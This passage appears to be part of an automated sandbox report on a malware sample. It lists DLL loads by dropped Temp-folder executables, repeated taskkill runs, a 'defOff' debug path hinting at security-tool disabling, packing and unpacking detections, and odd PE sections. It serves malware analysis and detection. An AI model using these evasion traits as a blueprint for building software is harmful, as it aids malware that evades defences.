Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\compatibility.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 3003904 > 1048576
Source: file.exe Static PE information: Raw size of pfboyhbl is bigger than: 0x100000 < 0x2b1a00
Source: Binary string: my_library.pdbU source: 1171a5b648.exe, 0000000A.00000003.2488093515.0000000004E2B000.00000004.00001000.00020000.00000000.sdmp, 1171a5b648.exe, 0000000A.00000002.2529289944.000000000011C000.00000040.00000001.01000000.0000000F.sdmp, num.exe, 0000001C.00000002.2604375299.0000000000EAC000.00000008.00000001.01000000.00000013.sdmp, 1171a5b648.exe, 0000001F.00000003.2632031246.0000000004EFB000.00000004.00001000.00020000.00000000.sdmp, 1171a5b648.exe, 0000001F.00000002.2685024844.000000000011C000.00000040.00000001.01000000.0000000F.sdmp, num[1].exe.8.dr
Source: Binary string: my_library.pdb source: 1171a5b648.exe, 0000000A.00000003.2488093515.0000000004E2B000.00000004.00001000.00020000.00000000.sdmp, 1171a5b648.exe, 0000000A.00000002.2529289944.000000000011C000.00000040.00000001.01000000.0000000F.sdmp, num.exe, 0000001C.00000002.2604375299.0000000000EAC000.00000008.00000001.01000000.00000013.sdmp, 1171a5b648.exe, 0000001F.00000003.2632031246.0000000004EFB000.00000004.00001000.00020000.00000000.sdmp, 1171a5b648.exe, 0000001F.00000002.2685024844.000000000011C000.00000040.00000001.01000000.0000000F.sdmp, num[1].exe.8.dr
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: QPHIWB3GKESEWV8SSDAQV1GC2I70.exe, 00000002.00000002.1999432818.0000000000192000.00000040.00000001.01000000.00000006.sdmp, QPHIWB3GKESEWV8SSDAQV1GC2I70.exe, 00000002.00000003.1866208811.0000000005110000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Unpacked PE file: 2.2.QPHIWB3GKESEWV8SSDAQV1GC2I70.exe.190000.0.unpack :EW;.rsrc:W;.idata :W;ucxgvins:EW;nulvttal:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Unpacked PE file: 3.2.EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe.460000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bleglpjp:EW;ozncbdew:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bleglpjp:EW;ozncbdew:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 4.2.skotes.exe.470000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bleglpjp:EW;ozncbdew:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bleglpjp:EW;ozncbdew:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 7.2.skotes.exe.470000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bleglpjp:EW;ozncbdew:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bleglpjp:EW;ozncbdew:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Unpacked PE file: 10.2.1171a5b648.exe.f0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;usisoqoi:EW;igxiqctn:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;usisoqoi:EW;igxiqctn:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Unpacked PE file: 31.2.1171a5b648.exe.f0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;usisoqoi:EW;igxiqctn:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;usisoqoi:EW;igxiqctn:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: num.exe.8.dr Static PE information: real checksum: 0x0 should be: 0xdb9be
Source: A5RXP2EPUMEJDLAL7A3JI.exe.13.dr Static PE information: real checksum: 0x2b0426 should be: 0x2affbf
Source: random[1].exe.8.dr Static PE information: real checksum: 0x2e22aa should be: 0x2ddb21
Source: EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe.0.dr Static PE information: real checksum: 0x1cae90 should be: 0x1d74b7
Source: B1DZUXGXMC4OXONLCU5KVQ.exe.13.dr Static PE information: real checksum: 0x1cae90 should be: 0x1d74b7
Source: 5TAVJ2XDPW30B3ZI4A9E75FX93.exe.9.dr Static PE information: real checksum: 0x2b0426 should be: 0x2affbf
Source: random[1].exe0.8.dr Static PE information: real checksum: 0x209bb8 should be: 0x20b8de
Source: 6cadd3f0fd.exe.8.dr Static PE information: real checksum: 0x2e22aa should be: 0x2ddb21
Source: file.exe Static PE information: real checksum: 0x2e22aa should be: 0x2ddb21
Source: 1171a5b648.exe.8.dr Static PE information: real checksum: 0x209bb8 should be: 0x20b8de
Source: skotes.exe.3.dr Static PE information: real checksum: 0x1cae90 should be: 0x1d74b7
Source: QPHIWB3GKESEWV8SSDAQV1GC2I70.exe.0.dr Static PE information: real checksum: 0x2b0426 should be: 0x2affbf
Source: num[1].exe.8.dr Static PE information: real checksum: 0x0 should be: 0xdb9be
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name: pfboyhbl
Source: file.exe Static PE information: section name: mirdfaun
Source: file.exe Static PE information: section name: .taggant
Source: QPHIWB3GKESEWV8SSDAQV1GC2I70.exe.0.dr Static PE information: section name:
Source: QPHIWB3GKESEWV8SSDAQV1GC2I70.exe.0.dr Static PE information: section name: .idata
Source: QPHIWB3GKESEWV8SSDAQV1GC2I70.exe.0.dr Static PE information: section name: ucxgvins
